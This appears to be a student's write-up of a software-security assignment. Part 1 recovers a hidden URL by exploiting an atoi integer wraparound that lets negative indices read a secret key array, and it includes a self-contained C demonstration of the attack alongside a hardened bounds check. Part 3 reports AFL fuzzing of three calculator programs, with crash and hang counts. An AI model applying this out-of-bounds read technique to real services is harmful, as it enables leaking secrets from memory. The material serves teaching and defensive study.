## Part 1
**The URL found:** [https://cs.adelaide.edu.au/~yval/SP18/assignment2.pdf!](https://cs.adelaide.edu.au/~yval/SP18/assignment2.pdf)
### Step 1 get MLEN
This step is easy: when I input `54`, the program outputs `Index 54 out of bounds`, but it still outputs the byte at
message[53]. From this I know `MLEN = 54`.
### Step 2 get message
This step is also easy: I input the indices 0 to 53 one by one to read all the bytes of the `message` array.
### Step 3 get key
This step is the most challenging.
I make use of the way the program parses the index with `atoi`:
```
int i = atoi(inbuf);
```
`atoi` returns an `int`, so a large value wraps around: inputting `4294967295` ($2^{32}-1$) yields `i = -1`, `4294967294` yields `i = -2`, and so on.
The bounds check does not catch these negative indices, so the program outputs the bytes at message[-1], message[-2], ...
The address of the `key` array is lower than that of `message`, so message[-1], message[-2], ... can reach the bytes of the `key` array.
I read message[-1], message[-2], ...
and observe that message[-1] through message[-10] are all 0, while from message[-11] onward the contents are non-zero.
Thus I guess that message[-11] is key[53], message[-12] is key[52], ..., and message[-64] is key[0].
### Step 4 compute the URL
Since I now have both `message` and `key`, each byte of the URL is the XOR of the corresponding bytes of `message` and `key`.
Under the part-1 directory, `results.txt` contains the bytes of `message` and `key` obtained through telnet, and `compute.py` computes the URL from `message` and `key`.
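The whole Part 1 procedure as one added worked example in C. This is not the assignment's binary and not the page's `compute.py`: it builds a constructed target whose `key` array sits ten zero bytes below `message` (an assumption mirroring the layout inferred in Step 3), shows the vulnerable `atoi`-based lookup beside a hardened one, and runs the attacker loop that reads `message[0..53]` directly, reaches `key` through the wrapped negative indices, and XORs the two arrays. The key bytes are constructed sample data; the plaintext is the URL from the page, whose terminating NUL makes it exactly 54 bytes. The wraparound relies on `long` being 64-bit (LP64 Linux), where `4294967295` parses to -1 exactly as observed above.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MLEN 54   /* message length found in Step 1 */
#define GAP  10   /* zero bytes observed between key and message in Step 3 */

/* Constructed stand-in for the target's globals. Putting `key` directly below
 * `message` with GAP bytes of zero padding mirrors the layout inferred in
 * Step 3; it is an assumption, not the real binary's layout. */
struct layout {
    unsigned char key[MLEN];
    unsigned char pad[GAP];
    unsigned char message[MLEN];
};

/* Constructed plaintext: the URL plus its terminating NUL is exactly MLEN bytes. */
static const char DEMO_URL[] = "https://cs.adelaide.edu.au/~yval/SP18/assignment2.pdf";
static struct layout g_target;

/* Build the target state: message = plaintext XOR key, with a constructed key. */
static int setup_demo(void)
{
    if (strlen(DEMO_URL) + 1 != MLEN)
        return -1;
    memset(&g_target, 0, sizeof g_target);
    for (int j = 0; j < MLEN; j++) {
        g_target.key[j] = (unsigned char)(j * 37 + 11);            /* constructed key */
        g_target.message[j] = (unsigned char)DEMO_URL[j] ^ g_target.key[j];
    }
    return 0;
}

/* Vulnerable lookup: `int i = atoi(inbuf);` followed by an upper-bound-only
 * check. atoi() is (int)strtol(), so on LP64 "4294967295" parses as
 * 4294967295L and truncates to -1, which passes `i >= MLEN`.
 * Returns the byte at message[i] (0..255), or -1 if the check rejects i. */
static int query_vuln(const char *inbuf)
{
    int i = atoi(inbuf);
    if (i >= MLEN)
        return -1;                               /* "Index N out of bounds" */
    /* Same as message[i]; indexing from the struct base keeps the negative
     * offsets inside one object so the demo itself stays well defined. */
    const unsigned char *base = (const unsigned char *)&g_target;
    return base[(long)offsetof(struct layout, message) + i];
}

/* Hardened lookup: parse with strtol, reject trailing junk and overflow,
 * and check the lower bound as well as the upper one. */
static int query_fixed(const char *inbuf)
{
    char *end;
    errno = 0;
    long v = strtol(inbuf, &end, 10);
    if (errno != 0 || end == inbuf || *end != '\0' || v < 0 || v >= MLEN)
        return -1;
    return g_target.message[v];
}

/* Attacker side (Steps 2 to 4): read message[0..53] directly; reach key[j],
 * which sits at message[j - (MLEN + GAP)], by sending 2^32 + (j - 64) so that
 * atoi wraps to that negative index; XOR the two bytes to get the plaintext. */
static int recover_url(char *out)
{
    char inbuf[16];
    for (int j = 0; j < MLEN; j++) {
        snprintf(inbuf, sizeof inbuf, "%d", j);
        int m = query_vuln(inbuf);
        snprintf(inbuf, sizeof inbuf, "%u", (unsigned)(j - (MLEN + GAP)));
        int k = query_vuln(inbuf);
        if (m < 0 || k < 0)
            return -1;
        out[j] = (char)(m ^ k);
    }
    return 0;
}

int main(void)
{
    char url[MLEN];                  /* url[MLEN - 1] is the recovered NUL */
    if (setup_demo() != 0 || recover_url(url) != 0)
        return 1;
    printf("recovered: %s\n", url);
    return 0;
}
```

The hardened version is the check a fix would need: `strtol` with an end-pointer and `errno` rejects junk and out-of-range input, and testing `v < 0` closes the negative-index path that the original `i >= MLEN` check leaves open.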
## Part 3
I use the `american fuzzy lop` (AFL) tool to fuzz the calc program of BigNum-2, BigNum-4 and BigNum-5.
The following are the steps for fuzzing BigNum-2; the steps for the other two are the same.
### Step 1
Modify the makefile to use `afl-clang`:
```
main: main.c bn.c
	../afl-2.52b/afl-clang -std=gnu99 -O2 -Wall -o calc main.c bn.c
```
### Step 2
Compile using the updated makefile:
```
Admin@BigNum-2 $ make
gcc -c bn.c -o bignum.o -Wall
ar -rcs libbn.a bignum.o
../afl-2.52b/afl-clang -std=gnu99 -O2 -Wall -o calc main.c bn.c
afl-cc 2.52b by <lcamtuf@google.com>
afl-as 2.52b by <lcamtuf@google.com>
[+] Instrumented 63 locations (64-bit, non-hardened mode, ratio 100%).
afl-as 2.52b by <lcamtuf@google.com>
[+] Instrumented 174 locations (64-bit, non-hardened mode, ratio 100%).
```
### Step 3
Create a new directory `test_cases` under `part2/BigNum-2` and add the seed input files to it.
### Step 4
Use the following command to start fuzzing. It tells the fuzzer to take its seed inputs from `./test_cases/` and to store its results in `find`; `find/crashes` and `find/hangs` hold the inputs that made the program crash or hang.
```
../afl-2.52b/afl-fuzz -i ./test_cases/ -o find ./calc
```
### Bugs found summary
I successfully used the tool to find inputs that crash or hang all three versions of the solution. `part-3/BigNum-*/find/crashes` stores the inputs that crash the program and `part-3/BigNum-*/find/hangs` stores the inputs that make it hang.
| solution | run time | **unique crashes** | **unique hangs** |
| --- | --- | --- | --- |
| BigNum-2 | 7 hrs, 16 min, 41 sec | 4 | 1 |
| BigNum-4 | 3 hrs, 1 min, 26 sec | 83 | 0 |
| BigNum-5 | 7 hrs, 11 min, 14 sec | 51 | 2 |
### Screenshots
![](2.png)
![](3.png)
![](4.png)
| BigNum-2 | BigNum-4 | BigNum-5 |
| --- | --- | --- |
| ![](2.png) | ![](4.png) | ![](5.png) |